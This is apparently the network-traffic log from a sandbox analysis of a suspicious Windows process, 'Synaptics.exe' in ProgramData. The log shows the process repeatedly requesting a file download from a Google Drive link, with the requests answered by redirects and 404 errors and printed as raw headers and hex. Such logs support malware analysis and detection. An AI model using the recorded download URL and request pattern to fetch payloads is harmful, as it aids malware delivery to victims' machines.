                                                                                                                                                                            X-GUploader-UploadID: AFiumC5qRgu0OBmV649NRheTdxp1c7CZxKLs9ShCrSLyizh0rNK2IEjHV1_v1tIigC3VSbvC
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MsE6aHpBxO2S3j0qbQiqIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="OMYfzZxgA4XbBb_OpgWvaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            80 | 192.168.2.8 | 49838 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7t0WD-bpPbivLYDUpzxuLMsvMCOYihjejscmkEaQcdN8OatQACHG-1eDbV8pL7RzBceCgvVg0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PL36cXIvHzcvqTRvFaVzrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ix7hP-X6sumoquD_2bN6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.8 | 49841 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:33 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-D2QQQuYHirXfNFYsPeiRvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.8 | 49844 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:34 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-34lTXDaVuxNZnFY7u4T9YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.8 | 49845 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:34 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9xtmTnx0tdQZhEXa_5DKkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.8 | 49846 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:34 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6eLmT1qhSR7aKdwAqkyVNEciZxcL5P_SWOy0LNYQoji3sXccAL8p2Kr8DoeAM39O4L
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6UlqBSHfNZDUIY2AG_ls9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:34 UTC  1390  IN  Data Ascii: t Found)!!1</title><style nonce="rL_Y_tqzUlYxSf4A-UDKfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            85  192.168.2.8  49847  142.250.185.161  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:34 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:34 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5IOqhIUp7Uw-16rJzbrIGZv2vQfEjG3ZHBKwUSHGRqzeeH8YdlkFja2ybPbJNrsBBY
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-S8MsMFEcalqjWn9HWJ5rQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:34 UTC  1390  IN  Data Ascii: t Found)!!1</title><style nonce="gKOlxQsT2ejYDWMwROCc5A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            86  192.168.2.8  49849  142.250.185.78  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:35 UTC  344  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            87  192.168.2.8  49848  142.250.185.78  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:35 UTC  344  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:35 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:35 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4IpSdMr5T0OOi1i4oaGi5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            88  192.168.2.8  49850  142.250.185.161  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:35 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            89  192.168.2.8  49851  142.250.185.161  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:35 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
